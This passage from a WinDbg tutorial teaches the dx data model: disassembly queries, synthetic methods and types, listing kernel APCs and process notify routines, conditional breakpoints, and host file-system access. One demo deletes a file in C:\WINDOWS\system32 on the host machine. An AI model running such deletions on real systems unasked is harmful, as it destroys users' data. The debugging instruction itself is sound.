And as the final step we will iterate over every thread, and over every IRP in them, and ExecuteCommand !irp <irp address>. Here too we need casting and ToDisplayString("x") to match the format expected by legacy commands (the output of !irp is very long so we trimmed it down to focus on the interesting data):

dx -r3 @$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))
@$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))                
[0x384]
[0x0]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5b8f4d40)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5b8f4dd0:
[0x1]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5bd24840)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5bd248d0:

Most of the information given to us by !irp we can get by parsing the IRPs with dx and dumping the IoStack for each. But there are a few things we might have a harder time to get but receive from the legacy command such as the existence and address of an IrpExtension and information about a possible Mdl linked to the Irp.

Disassembler

We used the u command as an example, though in this case there actually is functionality implementing this in dx, through Debugger.Utility.Code.CreateDisassember and DisassembleBlock, creating iterable and searchable disassembly:

dx -r3 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)                
[0xfffff80752ad2b61] : Basic Block [0xfffff80752ad2b61 - 0xfffff80752ad2b67)
StartAddress : 0xfffff80752ad2b61
EndAddress : 0xfffff80752ad2b67
Instructions
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0xfffff80752ad2b67] : Basic Block [0xfffff80752ad2b67 - 0xfffff80752ad2b7e)
StartAddress : 0xfffff80752ad2b67
EndAddress : 0xfffff80752ad2b7e
Instructions
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0xfffff80752ad2b7e] : Basic Block [0xfffff80752ad2b7e - 0xfffff80752ad2b80)
StartAddress : 0xfffff80752ad2b7e
EndAddress : 0xfffff80752ad2b80
Instructions
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0xfffff80752ad2b80] : Basic Block [0xfffff80752ad2b80 - 0xfffff80752ad2b81)
StartAddress : 0xfffff80752ad2b80
EndAddress : 0xfffff80752ad2b81
Instructions
...

And the cleaned-up version, picking only the instructions and flattening the tree:

dx -r2 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()                
[0x0]
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0x1]
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0x2]
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0x3]
[0xfffff80752ad2b80] : int 3
[0x4]
[0xfffff80752ad2b81] : int 3
...

Synthetic Methods

Another functionality that we get with this debugger data model is to create functions of our own and use them, with this syntax:

0: kd> dx @$multiplyByThree = (x => x * 3)
@$multiplyByThree = (x => x * 3)
0: kd> dx @$multiplyByThree(5)
@$multiplyByThree(5) : 15

Or we can have functions taking multiple arguments:

0: kd> dx @$add = ((x, y) => x + y)
@$add = ((x, y) => x + y)
0: kd> dx @$add(5, 7)
@$add(5, 7)      : 12

Or if we want to really go a few levels up, we can apply these functions to the disassembly output we saw earlier to find all writes into memory in ZwSetInformationProcess. For that there are a few checks we need to apply to each instruction to know whether or not it’s a write into memory:

· Does it have at least 2 operands?
For example, ret will have zero and jmp <address> will have one. We only care about cases where one value is being written into some location, which will always require two operands. To verify that we will check for each instruction Operands.Count() > 1.

· Is this a memory reference?
We are only interested in writes into memory and want to ignore instructions like mon r10, rcx. To do that, we will check for each instruction its Operands[0].Attributes.IsMemoryReference == true.
We check Operands[0] because that will be the destination. If we wanted to find memory reads we would have checked the source, which is in Operands[1].

· Is the destination operand an output?
We want to filter out instructions where memory is referenced but not written into. To check that we will use Operands[0].IsOutput == true.

· As our last filter we want to ignore memory writes into the stack, which will look like mov [rsp+0x18], 1 or mov [rbp-0x10], rdx.
We will check the register of the first operand and make sure its index is not the rsp index (0x14) or rbp index (0x15).

We will write a function, @$isMemWrite, that receives a block and only returns the instructions that contain a memory write, based in these checks. Then we can create a disassembler, disassemble our target function and only print the memory writes in it:

dx -r0 @$rspId = 0x14
dx -r0 @$rbpId = 0x15
dx -r0 @$isMemWrite = (b => b.Instructions.Where(i => i.Operands.Count() > 1 && i.Operands[0].Attributes.IsOutput && i.Operands[0].Registers[0].Id != @$rspId && i.Operands[0].Registers[0].Id != @$rbpId && i.Operands[0].Attributes.IsMemoryReference))
dx -r0 @$findMemWrite = (a => Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(a).Select(b => @$isMemWrite(b)))
dx -r2 @$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)
@$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)                
[0xfffff8074ebd23d4]
[0xfffff8074ebd23e9] : mov qword ptr [r10+80h],rax
[0xfffff8074ebd23f5] : mov qword ptr [r10+44h],rax
[0xfffff8074ebd2415]
[0xfffff8074ebd2421] : mov qword ptr [r10+98h],r8
[0xfffff8074ebd2428] : mov qword ptr [r10+0F8h],r9
[0xfffff8074ebd2433] : mov byte ptr gs:[5D18h],al
[0xfffff8074ebd25b2]
[0xfffff8074ebd25c3] : mov qword ptr [rcx],rax
[0xfffff8074ebd25c9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd25d0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd25d7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd25df] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd263f]
[0xfffff8074ebd264f] : and byte ptr [rax+5],0FDh
[0xfffff8074ebd26da]
[0xfffff8074ebd26e3] : mov qword ptr [rcx],rax
[0xfffff8074ebd26e9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd26f0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd26f7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd26ff] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd2708] : mov word ptr [rcx+72h],ax
...

As another project combining almost everything mentioned here, we can try to create a version of !apc using dx. To simplify we will only look for kernel APCs. To do that, we have a few steps:

  • Iterate over all the processes using @$cursession.Processes to find the ones containing threads where KTHREAD.ApcState.KernelApcPending is set to 1.
  • Make a container in the process with only the threads that have pending kernel APCs. Ignore the rest.
  • For each of these threads, iterate over KTHREAD.ApcState.ApcListHead[0] (contains the kernel APCs) and gather interesting information about them. We can do that with the FromListHead() method we’ve seen earlier.
    To make our container as similar as possible to !apc, we will only get KernelRoutine and RundownRoutine, though in your implementation you might find there are other fields that interest you as well.
  • To make the container easier to navigate, collect process name, ID and EPROCESS address, and thread ID and ETHREAD address.
  • In our implementation we implemented a few helper functions:
    @$printLn — runs the legacy command ln with the supplied address, to get information about the symbol
    @$extractBetween — extract a string between two other strings, will be used for getting a substring from the output of @$printLn
    @$printSymbol — Sends an address to @$printLn and extracts the symbol name only using @$extractSymbol
    @$apcsForThread — Finds all kernel APCs for a thread and creates a container with their KernelRoutine and RundownRoutine.

We then got all the processes that have threads with pending kernel APCs and saved it into the @$procWithKernelApcs register, and then in a separate command got the APC information using @$apcsForThread. We also cast the EPPROCESS and ETHREAD pointers to void* so dx doesn’t print the whole structure when we print the final result.

This was our way of solving this problem, but there can be others, and yours doesn’t have to be identical to ours!

The script we came up with is:

dx -r0 @$printLn = (a => Debugger.Utility.Control.ExecuteCommand(“ln “+((__int64)a).ToDisplayString(“x”)))
dx -r0 @$extractBetween = ((x,y,z) => x.Substring(x.IndexOf(y) + y.Length, x.IndexOf(z) — x.IndexOf(y) — y.Length))
dx -r0 @$printSymbol = (a => @$extractBetween(@$printLn(a)[3], “ “, “|”))
dx -r0 @$apcsForThread = (t => new {TID = t.Id, Object = (void*)&t.KernelObject, Apcs = Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&t.KernelObject.Tcb.ApcState.ApcListHead[0], “nt!_KAPC”, “ApcListEntry”).Select(a => new { Kernel = @$printSymbol(a.KernelRoutine), Rundown = @$printSymbol(a.RundownRoutine)})})
dx -r0 @$procWithKernelApc = @$cursession.Processes.Select(p => new {Name = p.Name, PID = p.Id, Object = (void*)&p.KernelObject, ApcThreads = p.Threads.Where(t => t.KernelObject.Tcb.ApcState.KernelApcPending != 0)}).Where(p => p.ApcThreads.Count() != 0)
dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

And it produces the following output:

dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})
@$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})                
[0x15b8]
Name : SearchUI.exe
Length : 0xc
PID : 0x15b8
Object : 0xffffb90a5b1300c0 [Type: void *]
ApcThreads
[0x159c]
TID : 0x159c
Object : 0xffffb90a5b14f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1528]
TID : 0x1528
Object : 0xffffb90a5aa6b080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b4]
TID : 0x16b4
Object : 0xffffb90a59f1e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16a0]
TID : 0x16a0
Object : 0xffffb90a5b141080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b8]
TID : 0x16b8
Object : 0xffffb90a5aab20c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1740]
TID : 0x1740
Object : 0xffffb90a5ab362c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1780]
TID : 0x1780
Object : 0xffffb90a5b468080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1778]
TID : 0x1778
Object : 0xffffb90a5b6f7080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d0]
TID : 0x17d0
Object : 0xffffb90a5b1e8080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d4]
TID : 0x17d4
Object : 0xffffb90a5b32f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17f8]
TID : 0x17f8
Object : 0xffffb90a5b32e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0xb28]
TID : 0xb28
Object : 0xffffb90a5b065600 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1850]
TID : 0x1850
Object : 0xffffb90a5b6a5080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList

Not as pretty as !apc, but still pretty

We can also print it as a table, receive information about the processes and be able to explore the APCs of each process separately:

dx -g @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

But wait, what are all these APCs withnt!EmpCheckErrataList? And why does SearchUI.exe have all of them? What does this process have to do with erratas?

The secret is that there are not actually APCs meant to callnt!EmpCheckErrataList. And no, the symbols are not wrong.

The thing we see here is happening because the compiler is being smart — when it sees a few different functions that have the same code, it makes them all point to the same piece of code, instead of duplicating this code multiple times. You might think that this is not a thing that would happen very often, but lets look at the disassembly for nt!EmpCheckErrataList (the old way this time):

u EmpCheckErrataList
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

This is actually just a stub. It might be a function that has not been implemented yet (probably the case for this one) or a function that is meant to be a stub for a good reason. The function that is the real KernelRoutine/RundownRoutine of these APCs is nt!KiSchedulerApcNop, and is meant to be a stub on purpose, and has been for many years. And we can see it has the same code and points to the same address:

u nt!KiSchedulerApcNop
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

So why do we see so many of these APCs?

When a thread is being suspended, the system creates a semaphore and queues an APC to the thread that will wait on that semaphore. The thread will be waiting until someone asks the resume it, and then the system will free the semaphore and the thread will stop waiting and will resume. The APC itself doesn’t need to do much, but it must have a KernelRoutine and a RundownRoutine, so the system places a stub there. In the symbols this stub receives the name of one of the functions that have this “code”, this time nt!EmpCheckErrataList, but it can be a different one in the next version.

Anyone interested in the suspension mechanism can look at ReactOS. The code for these functions changed a bit since, and the stub function was renamed from KiSuspendNop to KiSchedulerApcNop, but the general design stayed similar.

But I got distracted, this is not what this blog was supposed to be talking about. Let’s get back to WinDbg and synthetic functions:

Synthetic Types

After covering synthetic methods, we can also add our own named types and use them to parse data where the type is not available to us.

For example, let’s try to print the PspCreateProcessNotifyRoutine array, which holds all the registered process notify routines — function that are registered by drivers and will receive a notification whenever a process starts. But this array doesn’t contain pointers to the registered routines. Instead it contains pointers to the non-documented EX_CALLBACK_ROUTINE_BLOCK structure.

So to parse this array, we need to make sure WinDbg knows this type — to do that we use Synthetic Types. We start by creating a header file containing all the types we want to define (I used c:\temp\header.h). In this case it’s just EX_CALLBACK_ROUTINE_BLOCK, that we can find in ReactOS:

typedef struct _EX_CALLBACK_ROUTINE_BLOCK
{
_EX_RUNDOWN_REF RundownProtect;
void* Function;
void* Context;
} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;

Now we can ask WinDbg to load it and add the types to the nt module:

dx Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")
Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")                 : ntkrnlmp.exe(header.h)
ReturnEnumsAsObjects : false
RegisterSyntheticTypeModels : false
Module : ntkrnlmp.exe
Header : header.h
Types

This gives us an object which lets us see all the types added to this module.
Now that we defined the type, we can use it with CreateInstance:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074cbdff50 [Type: void *]
Context : 0x6e496c4102031400 [Type: void *]

It’s important to notice that CreateInstance only takes __int64 inputs so any other type has to be cast. It’s good to know this in advance because the error messages these modules return are not always easy to understand.

Now, if we look at our output, and specifically at Context, something seems weird. And actually if we try to dump Function we will see it doesn’t point to any code:

dq 0xfffff8074cbdff50
fffff807`4cbdff50 ????????`???????? ????????`????????
fffff807`4cbdff60 ????????`???????? ????????`????????
fffff807`4cbdff70 ????????`???????? ????????`????????
fffff807`4cbdff80 ????????`???????? ????????`????????
fffff807`4cbdff90 ????????`???????? ????????`????????

So what happened?
The problem is not our cast to EX_CALLBACK_ROUTINE_BLOCK, but the address we are casting. If we dump the values in PspCreateProcessNotifyRoutine we might see what it is:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)                
[0] : 0xffffb90a530504ef [Type: void * *]
[1] : 0xffffb90a532a512f [Type: void * *]
[2] : 0xffffb90a53da9d5f [Type: void * *]
[3] : 0xffffb90a53da9ccf [Type: void * *]
[4] : 0xffffb90a53e5d15f [Type: void * *]
[5] : 0xffffb90a571469ef [Type: void * *]
[6] : 0xffffb90a5714722f [Type: void * *]
[7] : 0xffffb90a571473df [Type: void * *]
[8] : 0xffffb90a597d989f [Type: void * *]

The lower half-byte in all of these is 0xF, while we know that pointers in x64 machines are always aligned to 8 bytes, and usually to 0x10. This is because I oversimplified it earlier — these are not pointers to EX_CALLBACK_ROUTINE_BLOCK, they are actually EX_CALLBACK structures (another type that is not in the public pdb), containing an EX_RUNDOWN_REF. But to make this example simpler we will treat them as simple pointers that have been ORed with 0xF, since this is good enough for our purposes. If you ever choose to write a driver that will handle PspCreateProcessNotifyRoutine please do not use this hack, look into ReactOS and do things properly. 😊
So to fix our command we just need to align the addresses to 0x10 before casting them. To do that we do:

<address> & 0xFFFFFFFFFFFFFFF0

Or the nicer version:

<address> & ~0xF

Let’s use that in our command:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074ea7f310 [Type: void *]
Context : 0x0 [Type: void *]

This looks better. Let’s check that Function actually points to a function this time:

ln 0xfffff8074ea7f310
Browse module
Set bu breakpoint
(fffff807`4ea7f310)   nt!ViCreateProcessCallback   |  (fffff807`4ea7f330)   nt!RtlStringCbLengthW
Exact matches:
nt!ViCreateProcessCallback (void)

Looks much better! Now we can get define this cast as a synthetic method and get the function addresses for all routines in the array:

dx -r0 @$getCallbackRoutine = (a => Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (__int64)(a & ~0xf)))
dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)                
[0] : 0xfffff8074ea7f310 [Type: void *]
[1] : 0xfffff8074ff97220 [Type: void *]
[2] : 0xfffff80750a41330 [Type: void *]
[3] : 0xfffff8074f8ab420 [Type: void *]
[4] : 0xfffff8075106d9f0 [Type: void *]
[5] : 0xfffff807516dd930 [Type: void *]
[6] : 0xfffff8074ff252c0 [Type: void *]
[7] : 0xfffff807520b6aa0 [Type: void *]
[8] : 0xfffff80753a63cf0 [Type: void *]

But this will be more fun if we could see the symbols instead of the addresses. We already know how to get the symbols by executing the legacy command ln, but this time we will do it with .printf. First we will write a helper function @$getsym which will run the command printf "%y", <address>:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])

Then we will send every function address to this method, to print the symbol:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))                
[0] : nt!ViCreateProcessCallback (fffff807`4ea7f310)
[1] : cng!CngCreateProcessNotifyRoutine (fffff807`4ff97220)
[2] : WdFilter!MpCreateProcessNotifyRoutineEx (fffff807`50a41330)
[3] : ksecdd!KsecCreateProcessNotifyRoutine (fffff807`4f8ab420)
[4] : tcpip!CreateProcessNotifyRoutineEx (fffff807`5106d9f0)
[5] : iorate!IoRateProcessCreateNotify (fffff807`516dd930)
[6] : CI!I_PEProcessNotify (fffff807`4ff252c0)
[7] : dxgkrnl!DxgkProcessNotify (fffff807`520b6aa0)
[8] : peauth+0x43cf0 (fffff807`53a63cf0)

There, much nicer!

Breakpoints

Conditional Breakpoint

Conditional breakpoints are a huge pain-point when debugging. And with the old MASM syntax they’re almost impossible to use. I spent hours trying to get them to work the way I wanted to, but the command turns out to be so awful that I can’t even understand what I was trying to do, not to mention why it doesn’t filter anything or how to fix it.

Well, these days are over. We can now use dx queries for conditional breakpoints with the following syntax: bp /w “dx query" <address>.

For example, let’s say we are trying to debug an issue involving file opens by Wow64 processes. The function NtOpenProcess is called all the time, but we only care about calls done by Wow64 processes, which are not the majority of processes on modern systems. So to avoid helplessly going through 100 debugger breaks until we get lucky or struggle with MASM-style conditional breakpoints, we can do this instead:

bp /w "@$curprocess.KernelObject.WoW64Process != 0" nt!NtOpenProcess

We then let the machine run, and when the breakpoint is hit we can check if it worked:

Breakpoint 3 hit
nt!NtOpenProcess:
fffff807`2e96b7e0 4883ec38 sub rsp,38h
dx @$curprocess.KernelObject.WoW64Process
@$curprocess.KernelObject.WoW64Process                 : 0xffffc10f5163b390 [Type: _EWOW64PROCESS *]
[+0x000] Peb : 0xf88000 [Type: void *]
[+0x008] Machine : 0x14c [Type: unsigned short]
[+0x00c] NtdllType : PsWowX86SystemDll (1) [Type: _SYSTEM_DLL_TYPE]
dx @$curprocess.Name
@$curprocess.Name : IpOverUsbSvc.exe
Length : 0x10

The process that triggered our breakpoint is a WoW64 process!
For anyone who has ever tried using conditional breakpoints with MASM, this is a life-changing addition.

Other Breakpoint Options

There are a few other interesting breakpoint options found under Debugger.Utility.Control:

  • SetBreakpointAtSourceLocation — allowing us to set a breakpoint in a module whose source file is available to us, with this syntax: dx Debugger.Utility.Control.SetBreakpointAtSourceLocation("MyModule!myFile.cpp", “172”)
  • SetBreakpointAtOffset — sets a breakpoint at an offset inside a function — dx Debugger.Utility.Control.SetBreakpointAtOffset("NtOpenFile", 8, “nt")
  • SetBreakpointForReadWriteFile — similar to the legacy ba command but with more readable syntax, this lets us set a breakpoint to issue a debug break whenever anyone reads or writes to an address. It has default configuration of type = Hardware Write and size = 1.
    For example, let’s try to break on every read of Ci!g_CiOptions, a variable whose size is 4 bytes:
dx Debugger.Utility.Control.SetBreakpointForReadWrite(&Ci!g_CiOptions, “Hardware Read”, 0x4)

We let the machine keep running and almost immediately our breakpoint is hit:

0: kd> g
Breakpoint 0 hit
CI!CiValidateImageHeader+0x51b:
fffff807`2f6fcb1b 740c je CI!CiValidateImageHeader+0x529 (fffff807`2f6fcb29)

CI!CiValidateImageHeader read this global variable when validating an image header. In this specific example, we will see reads of this variable very often and writes into it are the more interesting case, as it can show us an attempt to tamper with signature validation.

An interesting thing to notice about these commands in that they don’t just set a breakpoint, they actually return it as an object we can control, which has attributes like IsEnabled, Condition (allowing us to set a condition), PassCount (telling us how many times this breakpoint has been hit) and more.

FileSystem

Under Debugger.Utility we have the FileSystem module, letting us query and control the file system on the host machine (not the machine we are debugging) from within the debugger:

dx -r1 Debugger.Utility.FileSystem
Debugger.Utility.FileSystem
CreateFile       [CreateFile(path, [disposition]) - Creates a file at the specified path and returns a file object.  'disposition' can be one of 'CreateAlways' or 'CreateNew']
CreateTempFile   [CreateTempFile() - Creates a temporary file in the %TEMP% folder and returns a file object]
CreateTextReader [CreateTextReader(file | path, [encoding]) - Creates a text reader over the specified file.  If a path is passed instead of a file, a file is opened at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CreateTextWriter [CreateTextWriter(file | path, [encoding]) - Creates a text writer over the specified file.  If a path is passed instead of a file, a file is created at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CurrentDirectory : C:\WINDOWS\system32
DeleteFile       [DeleteFile(path) - Deletes a file at the specified path]
FileExists       [FileExists(path) - Checks for the existance of a file at the specified path]
OpenFile         [OpenFile(path) - Opens a file read/write at the specified path]
TempDirectory    : C:\Users\yshafir\AppData\Local\Temp

We can create files, open them, write into them, delete them or check if a file exists in a certain path. To see a simple example, let’s dump the contents of our current directory — C:\Windows\System32:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files
Debugger.Utility.FileSystem.CurrentDirectory.Files                
[0x0] : C:\WINDOWS\system32\07409496-a423-4a3e-b620-2cfb01a9318d_HyperV-ComputeNetwork.dll
[0x1] : C:\WINDOWS\system32\1
[0x2] : C:\WINDOWS\system32\103
[0x3] : C:\WINDOWS\system32\108
[0x4] : C:\WINDOWS\system32\11
[0x5] : C:\WINDOWS\system32\113
...
[0x44] : C:\WINDOWS\system32\93
[0x45] : C:\WINDOWS\system32\98
[0x46] : C:\WINDOWS\system32\@AppHelpToast.png
[0x47] : C:\WINDOWS\system32\@AudioToastIcon.png
[0x48] : C:\WINDOWS\system32\@BackgroundAccessToastIcon.png
[0x49] : C:\WINDOWS\system32\@bitlockertoastimage.png
[0x4a] : C:\WINDOWS\system32\@edptoastimage.png
[0x4b] : C:\WINDOWS\system32\@EnrollmentToastIcon.png
[0x4c] : C:\WINDOWS\system32\@language_notification_icon.png
[0x4d] : C:\WINDOWS\system32\@optionalfeatures.png
[0x4e] : C:\WINDOWS\system32\@VpnToastIcon.png
[0x4f] : C:\WINDOWS\system32\@WiFiNotificationIcon.png
[0x50] : C:\WINDOWS\system32\@windows-hello-V4.1.gif
[0x51] : C:\WINDOWS\system32\@WindowsHelloFaceToastIcon.png
[0x52] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-black.png
[0x53] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-white.png
[0x54] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.png
[0x55] : C:\WINDOWS\system32\@WirelessDisplayToast.png
[0x56] : C:\WINDOWS\system32\@WwanNotificationIcon.png
[0x57] : C:\WINDOWS\system32\@WwanSimLockIcon.png
[0x58] : C:\WINDOWS\system32\aadauthhelper.dll
[0x59] : C:\WINDOWS\system32\aadcloudap.dll
[0x5a] : C:\WINDOWS\system32\aadjcsp.dll
[0x5b] : C:\WINDOWS\system32\aadtb.dll
[0x5c] : C:\WINDOWS\system32\aadWamExtension.dll
[0x5d] : C:\WINDOWS\system32\AboutSettingsHandlers.dll
[0x5e] : C:\WINDOWS\system32\AboveLockAppHost.dll
[0x5f] : C:\WINDOWS\system32\accessibilitycpl.dll
[0x60] : C:\WINDOWS\system32\accountaccessor.dll
[0x61] : C:\WINDOWS\system32\AccountsRt.dll
[0x62] : C:\WINDOWS\system32\AcGenral.dll
...

We can choose to delete one of these files:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files[1].Delete()

Or delete it through DeleteFile:

dx Debugger.Utility.FileSystem.DeleteFile(“C:\\WINDOWS\\system32\\71”)

Notice that in this module paths have to have double backslash (“\\”), as they would if we had called the Win32 API ourselves.

As a last exercise we’ll put together a few of the things we learned here — we’re going to create a breakpoint on a kernel variable, get the symbol that accessed it from the stack and write the symbol the accessed it into a file on our host machine.

Let’s break it down into steps:

  • Open a file to write the results to.
  • Create a text writer, which we will use to write into the file.
  • Create a breakpoint for access into a variable. In this case we’ll choose nt!PsInitialSystemProcess and set a breakpoint for read access. We will use the old MASM syntax to run a dx command every time the breakpoint is hit and move on: ba r4 <address> "dx <command>; g"
    Our command will use @$curstack to get the address that accessed the variable, and then use the @$getsym helper function we wrote earlier to find the symbol for it. We’ll use our text writer to write the result into the file.
  • Finally, we will close the file.

Putting it all together:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])
dx @$tmpFile = Debugger.Utility.FileSystem.TempDirectory.OpenFile("log.txt")
dx @$txtWriter = Debugger.Utility.FileSystem.CreateTextWriter(@$tmpFile)
ba r4 nt!PsInitialSystemProcess "dx @$txtWriter.WriteLine(@$getsym(@$curstack.Frames[0].Attributes.InstructionOffset)); g"

We let the machine run for as long as we want, and when we want to stop the logging we can disable or clear the breakpoint and close the file with dx @$tmpFile.Close().

Now we can open our @$tmpFile and look at the results:

That’s it! What an amazingly easy way to log information about the debugger!

